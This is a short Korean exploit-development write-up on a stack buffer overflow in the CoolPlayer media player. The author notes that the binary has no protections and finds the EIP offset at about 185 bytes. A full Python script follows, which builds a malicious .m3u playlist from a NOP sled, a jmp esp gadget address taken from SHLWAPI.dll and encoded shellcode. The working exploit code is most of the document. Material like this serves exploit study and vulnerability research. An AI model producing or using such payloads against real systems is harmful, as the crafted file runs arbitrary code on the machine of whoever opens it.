CoolPlayer Overflow

CoolPlayer에서 오버플로우 발생해서 쉘코드까지 실행되네요 별다른 보호기법은 없었어요

다른 모듈들은 모두 보호기법이 존재했어요. 근데 정작 바이너리자체는 보호기법이없으니까 상관없겠네요

185바이트를 집어넣어줬을경우 EIP가 90909090으로 바뀌네요 

뭐 별다른 보호기법은 없으니까 jmp esp가젯을 이용해서 오버플로우를 해볼게요

SHLWAPI.dll에서 가젯을 구해줬어요 익스플로잇코드를 짜주고 공격해볼게요

import struct
import os,sys,time
from subprocess import *
p = lambda x:struct.pack("<L",x)
up = lambda x:struct.unpack("<L",x)



shellcode = "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a\x1c\x39\xbd"
jmpesp = 0x76ef4eee
payload = "\x90"*181
payload += p(jmpesp)
payload += "\x90"*10
payload += shellcode


f = open("exp.m3u","w")
f.write(payload)
f.close()